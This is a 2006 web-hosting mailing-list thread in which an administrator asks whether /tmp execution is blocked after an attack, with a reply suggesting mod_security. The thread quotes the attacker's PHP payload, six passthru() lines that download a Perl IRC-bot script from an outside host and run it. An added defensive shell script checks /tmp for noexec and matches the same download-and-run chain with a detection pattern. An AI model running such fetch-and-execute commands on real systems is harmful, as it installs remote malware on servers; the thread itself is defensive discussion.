Have you considered putting an application firewall on your box?
We installed mod_security on our servers - these attacks can then get
bounced off. Providing you keep an eye open for new attack methods, you can
then stay on top of it.
www.gotroot.com
www.modsecurity.org
Regards
Paul
----- Original Message -----
From: "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Saturday, September 09, 2006 9:44 PM
Subject: [coba-e:06808] /TMP Directory
> There was some discussion here lately about the security fix that stopped
> programs from running in /TMP. Is this configured by default if you have
> your BQ Yum updated? I got a DDOS today where the users were trying to run
> the following program via PHP:
>
> <?
> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;lwp-download http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt >v6.txt;perl v6.txt;rm -f v6*');
> ?>
>
> The v6.txt is a Perl script that installs some IRC software and monitors IRC
> on open ports. I do not think the script was successful in running, but I
> just want to make sure the /TMP security is enabled where files can't be run
> there. While I don't think the DDOS attack was successful in running the
> script, it was successful in shutting down the server due to MySQL becoming
> overwhelmed. Server load was up to 156!
>
> Any suggestions would be appreciated.
>
>
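The check Darrell asks about, written out as an added example that is not part of the thread: a POSIX shell script that reads a mounts listing in /proc/mounts format and reports whether /tmp carries noexec, plus a pattern match for the "download to /tmp, run through an interpreter, delete" command chain used by the posted payload. The mounts listing and the http://example.com/v6.txt URL are constructed for the example; on a live host pass "$(cat /proc/mounts)" instead of the sample. One caveat is worth stating plainly: noexec on /tmp only blocks execve() of files under /tmp. The payload never executes v6.txt directly; it executes /usr/bin/perl and hands it v6.txt as an argument, so a noexec /tmp would not have stopped this chain even if the download had succeeded. Rejecting request parameters that carry such a chain (the kind of thing a mod_security rule can do) or blocking the outbound fetch is what actually stops this stage.

```shell
#!/bin/sh
# Added example, not code from the thread.  Checks whether /tmp is mounted
# noexec and flags the "download to /tmp, run through an interpreter, delete"
# chain used by the posted payload.

# Constructed sample in /proc/mounts format (not taken from a real host).
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,noexec 0 0
none /proc proc rw 0 0'

# mount_opts MOUNTPOINT MOUNTS_TEXT
# Print the option list of the last entry mounted at MOUNTPOINT (a later
# mount over the same path shadows an earlier one, so the last line wins).
mount_opts() {
    printf '%s\n' "$2" | awk -v mp="$1" '$2 == mp { print $4 }' | tail -n 1
}

# has_opt OPTS OPT : exit 0 if the comma-separated OPTS contains the token OPT.
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# is_noexec MOUNTPOINT MOUNTS_TEXT : exit 0 if that mount has noexec set.
is_noexec() {
    opts=$(mount_opts "$1" "$2")
    [ -n "$opts" ] && has_opt "$opts" noexec
}

# is_fetch_and_interpret CMD : exit 0 if CMD fetches something with one of the
# download tools from the payload and then feeds a file to an interpreter.
# Matching is case-sensitive on purpose: "GET" is the LWP command-line tool.
is_fetch_and_interpret() {
    printf '%s\n' "$1" | grep -Eq \
        '(wget|curl|lwp-download|lynx|fetch|GET)[^;]*;[[:space:]]*(perl|python|sh|bash)[[:space:]]'
}

main() {
    if is_noexec /tmp "$SAMPLE_MOUNTS"; then
        echo "/tmp is noexec: a dropped binary cannot be executed directly"
    else
        echo "/tmp is NOT noexec"
    fi
    # noexec only stops execve() on files under /tmp.  "perl v6.txt" executes
    # /usr/bin/perl, which merely reads v6.txt, so this chain still runs on a
    # noexec /tmp; it has to be blocked at the request or at the outbound fetch.
    cmd='cd /tmp;wget http://example.com/v6.txt;perl v6.txt;rm -f v6*'
    if is_fetch_and_interpret "$cmd"; then
        echo "download-and-interpret chain detected: $cmd"
    fi
}

main "$@"
```

On a running BlueQuartz box the same check is `mount | grep ' /tmp '` and looking for noexec in the options; if it is missing, the page's own advice of running mod_security in front of PHP is the layer that catches the passthru chain before it reaches the shell.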